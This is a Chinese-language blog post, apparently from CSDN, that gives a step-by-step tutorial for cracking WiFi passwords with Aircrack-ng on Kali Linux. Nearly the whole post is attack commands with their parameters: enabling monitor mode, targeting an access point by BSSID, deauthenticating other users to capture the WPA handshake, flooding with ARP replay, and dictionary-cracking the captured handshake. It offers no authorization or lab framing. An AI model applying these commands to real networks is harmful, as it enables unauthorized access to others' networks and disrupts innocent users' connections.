渗透之Aircrack—wifi破解

版权声明:本文为博主原创文章,转载请注明出处! https://blog.csdn.net/qq_37964989/article/details/88973036

环境:kali

工具使用:无线网卡(型号雷凌RT3070L) //注意型号选择的使用,不同型号可能导致kali无法识别。

步骤总结:

1. kali连接外接无线网卡。

2. ifconfig查看网卡信息(新出现的wlan0网卡)

3. 开启网卡监听模式:airmon-ng start wlan0

4. wifi扫描:airodump-ng wlan0mon

5. 连接客户端:airodump-ng -c [channel] --bssid [ap's mac]  -w [file] wlan0mon

                       -c [channel]为目标信道  ;

                       --bssid  [ap's mac]为目标的mac地址

                       -w [file]为保存的文件名字

6. 冲突攻击模式/断开客户端连接: aireplay-ng -0 [number] -c [客户端mac] -a [目标mac] wlan0mon

                        -0 [number]为攻击的次数 //是-0数字零

                        -c [客户端mac]为目标wifi下其他用户的mac地址 

                        -a [目标mac] 为目标wifi的mac地址

          //通常步骤6多试几次便可获得握手包。

7. 流量洪攻击:aireplay-ng -3 -b [ap's mac] -h [客户端mac] wlan0mon

                       -b [目标mac] 为目标wifi的mac地址

                       -h [客户端mac]为目标wifi下其他用户的mac地址

                       -3 为攻击程度

8. 等待获取握手包

9. 字典破解:aircrack-ng -w [字典] [file]

                    -w [字典] 字典的路径

                     [file] 握手包文件名,即步骤5保存的文件

猜你喜欢

转载自blog.csdn.net/qq_37964989/article/details/88973036
今日推荐